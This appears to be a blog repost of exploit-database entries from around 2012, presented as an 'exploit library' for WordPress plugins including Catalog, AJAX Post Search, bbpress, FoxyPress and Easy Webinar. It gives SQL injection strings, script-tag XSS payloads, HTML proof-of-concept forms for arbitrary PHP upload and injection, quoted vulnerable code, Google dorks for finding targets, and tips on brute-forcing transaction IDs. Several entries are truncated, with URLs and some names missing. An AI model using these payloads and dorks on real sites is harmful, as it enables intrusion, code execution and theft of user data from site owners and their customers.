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Biggest wordpress Exploit Library

Biggest wordpress Exploit Library | Juno_okyo's Blog
Biggest wordpress Exploit Library:

0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm D4NB4R member from Inj3ct0r Team                   1
1               #########################################              0
#Exploit Title: Wordpress Plugin Catalog HTML Code Injection and Cross-site scripting
Dork: N/A
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Vendor: http://wordpress.org/extend/plugins/catalog/
Version: 1.1
License: Non-Commercial
Demo: http://www.web-dorado.com/products/wordpress-catalog.html
Download: http://downloads.wordpress.org/plugin/catalog.zip
Tested on: [Linux(Arch)-Windows(7ultimate)]
Spider WordPress Product Catalog plugin is a convenient tool for organizing the products represented on 
your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes
it easier for the customers to search and identify the needed products within the WordPress catalog. It 
is possible to add an unlimited number of parameters for each of the categories in the catalog in order to
allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can 
be accompanied with an image.
Vulnerable Parameter Name: 
?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
The error occurs when sending product reviews "view=showproduct" allowing the attacker 
to send code to your liking, not $_POST validate the form this code is stored in the db.
Exploit 1:  
HTML Code Injection 
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here". 
An example of html:
<center><marquee><h1>HTML code Injection Tested By D4NB4R</h1></marquee></center>
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}
Exploit 2: 
Cross-site scripting 
1. Select any of the products, click and give details or more
2. Once done this post your code on the form with title "Add your comment here".
An example of possible xss: 
<script>alert("Xss by D4NB4R")</script>
http://localhost/?s_p_c_t={Random id}&product_id={Random id}&view=showproduct&page_num={Random id}&back={Random id}

Exploit Title : SQl INJECTION AJAX Post Search --- wordpress plugin---
Author:Marcela Benetrix
Date: 10/12/12
version: 1.1
software link: http://wordpress.org/extend/plugins/cardoza-ajax-search/
AJAX Post Search wordpress plugin description
This plugin will allow your website visitors to search the posts of your site without page refresh.
SQL (blind) injection description
The problem was located in :cardoza_ajax_search.php file, to be more specific  the_search_function() . I could see that the srch_txt field hadn't been sanitized.
/wp-admin/admin-ajax.php/?srch_txt='or 1=1-- &action=the_search_text
via ajax
it is possible to access the database and as a consequence  get user information such as usernames, passwords among other data
Vendor Notification
10/12/2012 to: the developer. He replied immediately and fixed the problem.
posted in plugin track repository http://plugins.trac.wordpress.org/ticket/1588 
Because of it, a new version has been released

Souhail Hammou - Independant Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# Website : www.dark-puzzle.com
# Youtube : http://www.youtube.com/user/mariotrey
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .
# Exploit Title: Wordpress plugins - bbpress Multiple Vulnerabilities
# Author: Dark-Puzzle (Souhail Hammou)
# OSVDB ID : 86400 & 86399 .
# Vendor Website : www.bbpress.ru  /  www.bbpress.com
# Risk : Critical
# Version: All Versions
# Google Dork : N/A
# Category: Webapps/0day
# Tested on: Windows Xp Sp2 , Backtrack 5 R3 .
I - SQL Injection Vulnerability :
bbpress plugin is prone to an SQL injection Vulnerability .
In cases when you face a valid string column problem try to change syntax or instead spaces add /**/ .
Note: Automated injection can be more effective in this case.
Example :
http://www.example.com/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject here]
II - Full Path Disclosure Vulnerability :
The Full Path Disclosure vulnerability in bbpress is via Array .
Example :
Error : Warning: urlencode() expects parameter 1 to be string, array given in /Full/Path/Here on line 786
III - Directory Listing Vulnerability :

Multiple Vulnerabilities in Wordpress FoxyPress Plugin
Author: Janek Vind "waraxe"
Date: 30. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-95.html
Description of vulnerable target:
FoxyPress is a FREE shopping cart and product management tool that integrates
with FoxyCart's e-commerce solution to help you get your store up and running
quickly and efficiently. 
Affected version:
1. Arbitrary File Upload Vulnerability in "documenthandler.php"
Reasons: Missing security checks in file upload functionality
Attack vectors: Uploaded file
Preconditions: Logged in as admin with FoxyPress product editing privileges
Php script "documenthandler.php" line 14:
------------------------[ source code start ]----------------------------------
if (!empty($_FILES)) {
$newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id,
$targetpath, $prefix);    
$targetpath = $targetpath . $newfilename;     
if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath))
------------------------[ source code end ]------------------------------------
As we can see above, there is no security checks against uploaded file. As
result, attacker is able to upload files with arbitrary extension to remote
system. In case of php files this vulnerability leads to RCE (Remote Code
1. Open product editing webpage:
2. Look for "Digital Downloads". Insert some number to the input box below:
"Max Downloads allowed (if you need to override the main setting)".
3. There must be "Browse Files" button (Flash-based). Choose the php file, you
want to upload.
We can observe AJAX in action and as result download link appears:
Opening that download link will execute previously uploaded php file.
2. SQL Injection Vulnerability in "documenthandler.php"
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied POST parameter "prefix"
Preconditions: Logged in as admin with FoxyPress product editing privileges
Php script "documenthandler.php" line 14:
------------------------[ source code start ]----------------------------------
if (!empty($_FILES)) {
$inventory_id = intval( $_POST['inventory_id'] );
$downloadabletable = $_POST['prefix'];
$query = "INSERT INTO " . $downloadabletable . " SET inventory_id='"
. $inventory_id . "', filename='" . mysql_escape_string($newfilename)
. "',  maxdownloads= '" . mysql_escape_string($downloadablemaxdownloads)
. "', status = 1";
------------------------[ source code end ]------------------------------------
We can see, that user-supplied POST parameter "prefix" in used in subsequent
SQL "INSERT INTO" query as table name. There is no input data sanitization,
therefore attacker is able to insert any data to any tables in current database.
Test (parameter "security" must be valid):
-------------------------[ test code start ]-----------------------------------
<form action="http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_download&security=844b64ce45" method="post" enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="downloadablemaxdownloads" value="1">
<input type="hidden" name="prefix" value="waraxe">
<input type="submit" value="Test">
--------------------------[ test code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Table 'wp342.waraxe' doesn't exist]
INSERT INTO waraxe SET inventory_id='0', filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1
3. SQL Injection Vulnerability in "foxypress-manage-emails.php"
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied GET parameter "id"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "foxypress-manage-emails.php" line 14:
------------------------[ source code start ]----------------------------------
function foxypress_manage_emails_page_load() 
global $wpdb;
if(isset($_GET['mode']) && $_GET['mode']=='edit')
$sql = "UPDATE  ". $wpdb->prefix . "foxypress_email_templates set 
foxy_email_template_from='" . $from . "'
WHERE email_template_id=".$_GET[id];
------------------------[ source code end ]------------------------------------
-------------------------[ test code start ]-----------------------------------
<form action="http://localhost/wp342/wp-admin/edit.php?post_type=foxypress_product&page=manage-emails&mode=edit&id=waraxe" method="post">
<input type="hidden" name="foxy_em_save" value="1">
<input type="hidden" name="templatename" value="2">
<input type="hidden" name="subject" value="3">
<input type="submit" value="Test">
--------------------------[ test code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Unknown column 'waraxe' in 'where clause']
UPDATE wp_foxypress_email_templates set foxy_email_template_name='2',
foxy_email_template_subject='3', foxy_email_template_email_body='',
foxy_email_template_from='' WHERE email_template_id=waraxe
4. SQL Injection Vulnerabilities in "inventory-category.php"
Reasons: Insufficient sanitization of user-supplied data
Attack vectors:
1. case: User-supplied POST parameter "foxy_cat_id"
2. case: User-supplied GET parameter "category_id"
Preconditions: Logged in as admin with FoxyPress management privileges
--> Case 1 <-- 
Php script "inventory-category.php" line 28:
------------------------[ source code start ]----------------------------------
else if(isset($_POST['foxy_cat_save'])) //updating
$Category_Name = foxypress_FixPostVar('foxy_cat_name');
$Category_ID = foxypress_FixPostVar('foxy_cat_id');
$sql = "UPDATE " . $wpdb->prefix . "foxypress_inventory_categories SET
category_name='" . $Category_Name . "' WHERE category_id=" . $Category_ID;
------------------------[ source code end ]------------------------------------
-------------------------[ test code start ]-----------------------------------
<form action="http://localhost/wp342/wp-admin/edit.php?post_type=foxypress_product&page=inventory-category" method="post">
<input type="hidden" name="foxy_cat_save" value="1">
<input type="hidden" name="foxy_cat_name" value="1">
<input type="hidden" name="foxy_cat_id" value="waraxe">
<input type="submit" value="Test">
--------------------------[ test code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Unknown column 'waraxe' in 'where clause']
UPDATE wp_foxypress_inventory_categories SET category_name='1' WHERE category_id=waraxe
--> Case 2 <-- 
Php script "inventory-category.php" line 36:
------------------------[ source code start ]----------------------------------
else if($mode == "delete" &&  foxypress_FixGetVar('category_id') != "") //deleting
$category_id = foxypress_FixGetVar('category_id');
//delete from categories
$sql = "DELETE FROM " . $wpdb->prefix . "foxypress_inventory_categories WHERE category_id=" . $category_id;
//delete  from inventory to categories
$sql = "DELETE FROM " . $wpdb->prefix . "foxypress_inventory_to_category WHERE category_id=" . $category_id;
------------------------[ source code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_foxypress_inventory_categories WHERE category_id=waraxe
WordPress database error: [Unknown column 'waraxe' in 'where clause']
DELETE FROM wp_foxypress_inventory_to_category WHERE category_id=waraxe
5. SQL Injection Vulnerabilities in "affiliate-management.php"
Reasons: Insufficient sanitization of user-supplied data
Attack vectors:
1. case: User-supplied GET parameter "order"
2. case: User-supplied GET parameter "banner_id"
3. case: User-supplied GET parameter "affiliate_id"
Preconditions: Logged in as admin with FoxyPress management privileges
--> Case 1 <-- 
Php script "affiliate-management.php" line 1060:
------------------------[ source code start ]----------------------------------
function foxypress_create_affiliate_table() {
$banner_order_by     = $fp_banner->foxypress_FixGetVar('orderby');
$banner_order        = $fp_banner->foxypress_FixGetVar('order');
$fp_banner->prepare_items($banner_order_by, $banner_order); 
function prepare_items($order_by = '', $order = '')
if (!$order) {
$sort_order = 'ASC';
} else {
$sort_order = strtoupper($order);
if ($order_by === 'management_asset_name')
$sort_by = 'foxy_asset_name ' . $sort_order;
$sql_data = "SELECT *
FROM " . $wpdb->base_prefix . "foxypress_affiliate_assets
ORDER BY " . $sort_by;
$data = $wpdb->get_results($sql_data);
------------------------[ source code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [You have an error in your SQL syntax; check the 
manual that corresponds to your MySQL server version for the right syntax to
use near 'WARAXE' at line 3]
SELECT * FROM wp_foxypress_affiliate_assets ORDER BY foxy_asset_name WARAXE
--> Case 2 <-- 
Php script "affiliate-management.php" line 217:
------------------------[ source code start ]----------------------------------
function get_affiliate_banner()
global $wpdb;
$banner_id = $this->foxypress_FixGetVar('banner_id');
$data = "SELECT *
FROM " . $wpdb->prefix . "foxypress_affiliate_assets
WHERE id = " . $banner_id;
return $wpdb->get_results($data);
------------------------[ source code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_foxypress_affiliate_assets WHERE id = waraxe
Test (fetching admin credentials from database, table prefix must be valid):
--> Case 3 <-- 
Php script "affiliate-management.php" line 951:
------------------------[ source code start ]----------------------------------
$affiliate_id = $this->foxypress_FixGetVar('affiliate_id');
$sql_data = "SELECT *
FROM " . $wpdb->prefix . "foxypress_affiliate_payments
WHERE foxy_affiliate_id = " . $affiliate_id . "
ORDER BY " . $sort_by;
$data = $wpdb->get_results($sql_data);
------------------------[ source code end ]------------------------------------
Result (Wordpress must be set to show SQL errors):
WordPress database error: [Unknown column 'waraxe' in 'where clause']
SELECT * FROM wp_foxypress_affiliate_payments 
WHERE foxy_affiliate_id = waraxe ORDER BY foxy_transaction_id DESC
Test (fetching admin credentials from database, table prefix must be valid):
6. Reflected XSS Vulnerability in "reports.php"
Reasons: Improper encoding or escaping of output
Attack vectors: User-supplied POST parameters "txtStartDate", "txtEndDate", "txtProductCode"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "reports.php" line 68:
------------------------[ source code start ]----------------------------------
if(isset($_POST['txtStartDate'])){$txtStartDate = $_POST['txtStartDate'];}else{$txtStartDate = "";}
if(isset($_POST['txtEndDate'])){$txtEndDate = $_POST['txtEndDate'];}else{$txtEndDate = "";}
if(isset($_POST['txtProductCode'])){$txtProductCode = $_POST['txtProductCode'];}else{$txtProductCode = "";}
<input type="text" id="txtStartDate" name="txtStartDate" value="
<?php echo(($txtStartDate != "") ? $txtStartDate : date("Y-m-d"))  ?>" />
<input type="text" id="txtEndDate" name="txtEndDate"  value="
<?php echo(($txtEndDate != "") ? $txtEndDate : date("Y-m-d")); ?>" />
<td><input id="txtProductCode" name="txtProductCode" type="text" value="
<?php echo($txtProductCode);?>" /></td>
------------------------[ source code end ]------------------------------------
-------------------------[ test code start ]-----------------------------------
<form action="http://localhost/wp342/wp-admin/edit.php?post_type=foxypress_product&page=reports&report=2" method="post">
<input type="hidden" name="txtStartDate" value='"><script>alert(123)</script>'>
<input type="hidden" name="txtEndDate" value='"><script>alert(223)</script>'>
<input type="hidden" name="txtProductCode" value='"><script>alert(323)</script>'>
<input type="submit" value="Test">
--------------------------[ test code end ]------------------------------------
7. Reflected XSS Vulnerability in "foxypress-manage-emails.php"
Reasons: Improper encoding or escaping of output
Attack vectors: User-supplied GET parameter "id"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "foxypress-manage-emails.php" line 42:
------------------------[ source code start ]----------------------------------
<td width="180"><?php _e('Template ID', 'foxypress'); ?></td><td><?php _e($_GET['id']); ?></td>
------------------------[ source code end ]------------------------------------
8. Reflected XSS Vulnerability in "foxypress-affiliate.php"
Reasons: Improper encoding or escaping of output
Attack vectors: User-supplied GET parameter "aff_id"
Preconditions: Logged in as Wordpress user
Php script "foxypress-affiliate.php" line 16:
------------------------[ source code start ]----------------------------------
$affiliate_id = $_GET['aff_id'];
$_*******['affiliate_id'] = $affiliate_id;
------------------------[ source code end ]------------------------------------
Php script "affiliate-signup.php" line 140:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="affiliate_referred_by_id" id="affiliate_referred_by_id"
value="<?php echo $_*******['affiliate_id']; ?>">
------------------------[ source code end ]------------------------------------
Test (two-step XSS):
1. Log in as Wordpress user who is not yet registered affiliate
2. open URL below:
3. open affiliate signup page:
Result: we can observe XSS payload execution
9. Reflected XSS Vulnerability in "order-management.php"
Reasons: Improper encoding or escaping of output
Attack vectors: User-supplied GET parameter "status"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "order-management.php" line 173:
------------------------[ source code start ]----------------------------------
$List_Status = foxypress_FixGetVar("status", "");
$basePage =  $Page_URL . "?post_type=" . FOXYPRESS_CUSTOM_POST_TYPE . 
"&page=order-management&status=" . $List_Status . "&mode=list";
<option value=\"" . $basePage  . "\"" . (($Transaction_Type == "") ? 
"selected='selected'" : "") . ">" . __('All Transactions', 
'foxypress') . "</option>
------------------------[ source code end ]------------------------------------
10. Reflected XSS Vulnerability in "affiliate-management.php"
Reasons: Improper encoding or escaping of output
Attack vectors: User-supplied POST parameter "page"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "affiliate-management.php" line 1125:
------------------------[ source code start ]----------------------------------
<input type="hidden" name="page" value="<?php echo $_REQUEST['page'] ?>" />
------------------------[ source code end ]------------------------------------
-------------------------[ test code start ]-----------------------------------
<form action="http://localhost/wp342/wp-admin/edit.php?post_type=foxypress_product&page=affiliate-management" method="post">
<input type="hidden" name="page" value='"><script>alert(123);</script>'>
<input type="submit" value="Test">
--------------------------[ test code end ]------------------------------------
11. Open Redirect Vulnerability in "foxypress-affiliate.php"
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied GET parameter "url"
Preconditions: none
Results: allows remote attackers to redirect users to arbitrary web sites and
conduct phishing attacks
Php script "foxypress-affiliate.php" line 17:
------------------------[ source code start ]----------------------------------
if (isset($_GET['url'])) {
$destination_url = $_GET['url'];
header('Location: ' . $destination_url);
------------------------[ source code end ]------------------------------------
12. Information Leakage Vulnerability via directly accessible CSV files
Foxypress is using three different CSV files - "Inventory.csv", "Export.csv"
and "Coupons.csv" as containers for temporal data. These three files are directly
accessible and can be downloaded without any restrictions. As result attacker
may obtain potentially sensitive information.
Php script "import-export.php" line 34:
------------------------[ source code start ]----------------------------------
if (move_uploaded_file($_FILES['file_import']['tmp_name'],
WP_PLUGIN_DIR . '/foxypress/Inventory.csv'))
$f = fopen(WP_PLUGIN_DIR . "/foxypress/Export.csv", "x+");
fputcsv($f, $line );
fseek($f, -1, SEEK_CUR);
fwrite($f, "\r\n"); 
------------------------[ source code end ]------------------------------------
Php script "reports.php" line 557:
------------------------[ source code start ]----------------------------------
$f = fopen(WP_PLUGIN_DIR . "/foxypress/Coupons.csv", "x+");
fputcsv($f, $line);
fseek($f, -1, SEEK_CUR);
fwrite($f, "\r\n"); 
------------------------[ source code end ]------------------------------------
13. CSRF Vulnerability in "affiliate-management.php"
1. Using GET method for non-idempotent operations
2. Missing anti-CSRF measures (for example "check_admin_referer()")
Attack vectors: User-supplied GET parameters "mode" and "banner_id"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "affiliate-management.php" line 1348:
------------------------[ source code start ]----------------------------------
<?php } else if ($mode === 'delete_banner') { 
global $wpdb;
$banner_id = $fp_banner->foxypress_FixGetVar('banner_id');
$sql = "DELETE FROM " . $wpdb->prefix . "foxypress_affiliate_assets
WHERE ID = '" . $banner_id . "'";
------------------------[ source code end ]------------------------------------
Result: "Banner Deleted!"
14. CSRF Vulnerabilities in "inventory-category.php"
1. Using GET method for non-idempotent operations
2. Missing anti-CSRF measures (for example "check_admin_referer()")
Attack vectors: User-supplied GET parameters "mode" and "category_id"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "inventory-category.php" line 36:
------------------------[ source code start ]----------------------------------
else if($mode == "delete" &&  foxypress_FixGetVar('category_id') != "") //deleting
$category_id = foxypress_FixGetVar('category_id');
//delete from categories
$sql = "DELETE FROM " . $wpdb->prefix . "foxypress_inventory_categories 
WHERE category_id=" . $category_id;
//delete  from inventory to categories
$sql = "DELETE FROM " . $wpdb->prefix . "foxypress_inventory_to_category
WHERE category_id=" . $category_id;
else if($mode == "delete_image" && foxypress_FixGetVar('category_id') != "")
$category_id = foxypress_FixGetVar('category_id');
foxypress_DeleteItem($directory . $data->category_image);
$wpdb->query("UPDATE " . $wpdb->prefix . "foxypress_inventory_categories SET
category_image = NULL where category_id =
'" . mysql_escape_string($category_id) . "'");
------------------------[ source code end ]------------------------------------
15. CSRF Vulnerability in "inventory-option-groups.php"
1. Using GET method for non-idempotent operations
2. Missing anti-CSRF measures (for example "check_admin_referer()")
Attack vectors: User-supplied GET parameters "action" and "optiongroupid"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "inventory-option-groups.php" line 15:
------------------------[ source code start ]----------------------------------
$action = foxypress_FixGetVar("action");
else if($action == "deleteoptiongroup")
$option_group_id = foxypress_FixGetVar('optiongroupid', '');
if($option_group_id != "")
//delete option group
$wpdb->query("delete from " . $wpdb->prefix . "foxypress_inventory_option_group"
. " where option_group_id = '" . $option_group_id . "'");
//delete options related to option group
$wpdb->query("delete from " . $wpdb->prefix . "foxypress_inventory_options"
. " where option_group_id = '" . $option_group_id . "'");
------------------------[ source code end ]------------------------------------
16. CSRF Vulnerability in "status-management.php"
1. Using GET method for non-idempotent operations
2. Missing anti-CSRF measures (for example "check_admin_referer()")
Attack vectors: User-supplied GET parameters "action" and "status"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "status-management.php" line 18:
------------------------[ source code start ]----------------------------------
$StatusID = foxypress_FixGetVar("status", "");
$Action = foxypress_FixGetVar("action", "");
if($Action == "delete" && $StatusID != "" && $StatusID != "1")
//delete status
$sql = "delete from  " . $wpdb->prefix . "foxypress_transaction_status 
WHERE foxy_transaction_status = '$StatusID'";
//update transactions in limbo to unprocessed
$sql = "update " . $wpdb->prefix ."foxypress_transaction SET 
foxy_transaction_status = '1' WHERE foxy_transaction_status = '$StatusID'";
------------------------[ source code end ]------------------------------------
17. CSRF Vulnerability in "order-management.php"
1. Using GET method for non-idempotent operations
2. Missing anti-CSRF measures (for example "check_admin_referer()")
Attack vectors: User-supplied GET parameters "action" and "note"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "order-management.php" line 19:
------------------------[ source code start ]----------------------------------
$Page_Action = foxypress_FixGetVar("action", "");
else if($Page_Action == "deletenote" && foxypress_FixGetVar("note", "") != "")
$NoteID = foxypress_FixGetVar("note", "");
$sql = "delete from  " . $wpdb->prefix . "foxypress_transaction_note 
WHERE foxy_transaction_id = '$TransactionID' and
------------------------[ source code end ]------------------------------------
18. CSRF Vulnerability in "foxypress-manage-emails.php"
1. Using GET method for non-idempotent operations
2. Missing anti-CSRF measures (for example "check_admin_referer()")
Attack vectors: User-supplied GET parameters "action" and "id"
Preconditions: Logged in as admin with FoxyPress management privileges
Php script "foxypress-manage-emails.php" line 450:
------------------------[ source code start ]----------------------------------
$action = foxypress_FixGetVar('action');
if ($action === 'updated') { 
}else if ($action === 'delete') { 
sql = "delete from  " . $wpdb->prefix . "foxypress_email_templates
WHERE email_template_id = '".$_GET['id']."'";
------------------------[ source code end ]------------------------------------
Result: "Your email template has been successfully deleted!"
19. Unauthorized Access Vulnerability in "ajax.php"
Reasons: missing authorization
Preconditions: none
Php script "ajax.php" line 7:
------------------------[ source code start ]----------------------------------
$mode = foxypress_FixGetVar('m');
header('Content-type: application/json');     
if($mode == "tracking")
//tracking vars
$lastname = foxypress_FixGetVar('ln');
$id = foxypress_FixGetVar('id');    
//search table for tracking number
$item = $wpdb->get_row("SELECT t.*, s.foxy_transaction_status_description
FROM " .  $wpdb->prefix . "foxypress_transaction as t
INNER JOIN " . $wpdb->prefix . "foxypress_transaction_status as s on 
t.foxy_transaction_status = s.foxy_transaction_status
WHERE t.foxy_transaction_id = '" . $id . "'
and LOWER(t.foxy_transaction_last_name) = LOWER('" . $lastname . "')");
else if($mode == "deletedownloadable")
$*******_id = foxypress_FixGetVar('sid');
$downloadable_id = foxypress_FixGetVar('downloadableid');
if($*******_id == *******_id())
$query = "UPDATE ". $wpdb->prefix  . "foxypress_inventory_downloadables SET
status = '0'
WHERE downloadable_id='" . mysql_escape_string($downloadable_id) . "'";        
else if($mode == "savemaxdownloads")
else if($mode == "resetdownloadcount")
else if($mode == "save-image-order")
else if($mode == "transaction_submit")
//save transaction status
$sql = "update " . $wpdb->prefix ."foxypress_transaction SET 
foxy_transaction_status = '$NewStatus', 
foxy_transaction_trackingnumber = '$TrackingNumber',
foxy_transaction_rmanumber = '$RMANumber'
WHERE foxy_transaction_id = '$TransactionID'";
------------------------[ source code end ]------------------------------------
Php script "ajax.php" can handle six different operations: "tracking",
"deletedownloadable", "savemaxdownloads", "resetdownloadcount",
"save-image-order" and "transaction_submit". There is no authorization checks
at all, so anyone can use this script, no valid ******* required.
This security vulnerability may lead to information leakage and data tampering.
1. operation "tracking": if attacker can guess transaction ID and subject's last
name, then it is possible to obtain shipping address, transaction status and
tracking number. Transaction ID is integer and can be bruteforced.
Test (transaction ID "id" and last name "ln" must be valid):
2. operations "deletedownloadable", "savemaxdownloads", "resetdownloadcount"
allows unauthorized attacker to manipulate with digital downloads settings.
There is a check for valid php ******* ID, so attack will be 2-step.
First, let's open "ajax.php" webpage, so that php ******* is created:
Php ******* ID can be found from cookies:
Next, let's issue GET request with found ******* ID:
Result: {"ajax_status":"ok"}
In this way unauthorized attacker can delete (disable) any digital downloads.
3. operation "save-image-order" allows unauthorized attacker to change menu
ordering and has minor effect.
4. operation "transaction_submit" allows unauthorized attacker to change 
transaction status, tracking number and RMA number, if transaction ID is known.
Transaction ID is integer and can be bruteforced.
20. Full Path Disclosure Vulnerability in multiple scripts
Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive "display_errors=on"
Result: Information Exposure Through an Error Message
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\foxypress\custom-post-type.php on line 9
Fatal error: Call to undefined function load_plugin_textdomain() in
C:\apache_www\wp342\wp-content\plugins\foxypress\foxypress-manage-emails.php on line 9
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\foxypress\foxypress-redirect.php on line 8
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\foxypress\foxypress-settings.php on line 8
Fatal error: Call to undefined function load_plugin_textdomain() in
C:\apache_www\wp342\wp-content\plugins\foxypress\foxypress-templates.php on line 9
Fatal error: Call to undefined function register_activation_hook() in
C:\apache_www\wp342\wp-content\plugins\foxypress\foxypress.php on line 46
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\foxypress\import-export.php on line 8

# Exploit Title: Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability
# Vendor Homepage: www.easywebinarplugin.com
# Date: 10/26/2012
# Author: Robert Cooper (robert.cooper [at] areyousecure.net)
# Tested on: [Linux/Windows 7]
#Vulnerable Parameters: wid=
# Google Dork: allinurl: get-widget.php?wid=
Note: The HTTP response will read 404, but this is false:
www.example.com/wp-content/plugins/webinar_plugin/get-widget.php?wid=3' or 'x'='x
This will result in the page loading correctly and show that the plugin is vulnerable to injection (string).

Description of vulnerable target:
Slideshow provides an easy way to integrate a slideshow for any WordPress
Any image can be loaded into the slideshow by picking it from the WordPress
media page, even images you've already uploaded can be inserted into your
slideshow right away!
Affected version: 2.1.12
1. Reflected XSS in "views/SlideshowPlugin/slideshow.php"
1. Uninitialized variables "$randomId", "$slides" and "$settings"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "randomId", "slides" and "settings"
Preconditions: PHP directive register_globals=on
2. Reflected XSS in "views/SlideshowPluginPostType/settings.php"
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on
3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php"
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on
4. Full Path Disclosure in multiple scripts
Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message
Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\slideshow.php on line 34
Fatal error: Class 'WP_Widget' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\classes\SlideshowPluginWidget.php on line 8
Fatal error: Class 'SlideshowPluginMain' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPlugin\slideshow.php on line 111
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\information.php on line 1
Warning: Invalid argument supplied for foreach() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\settings.php on line 3
Fatal error: Class 'SlideshowPluginSlideInserter' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\slides.php on line 3
Warning: Invalid argument supplied for foreach() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\style-settings.php on line 2
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\support-plugin.php on line 3
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\insert-image-button.php on line 1
Fatal error: Call to undefined function _e() in 
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\insert-text-button.php on line 1
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\insert-video-button.php on line 1
Fatal error: Call to undefined function submit_button() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginSlideInserter\search-popup.php on line 6
Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginUpload\upload-button.php on line 1
Fatal error: Using $this when not in object context in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginWidget\form.php on line 2

# Exploit Title: WP-TopBar 4.02 CSRF
# Date: 2012-09-13
# Author: Blake Entrekin
# Version: 4.02
# Download Link: http://downloads.wordpress.org/plugin/wp-topbar.4.02.zip
# Vendor Link: http://wordpress.org/extend/plugins/wp-topbar/
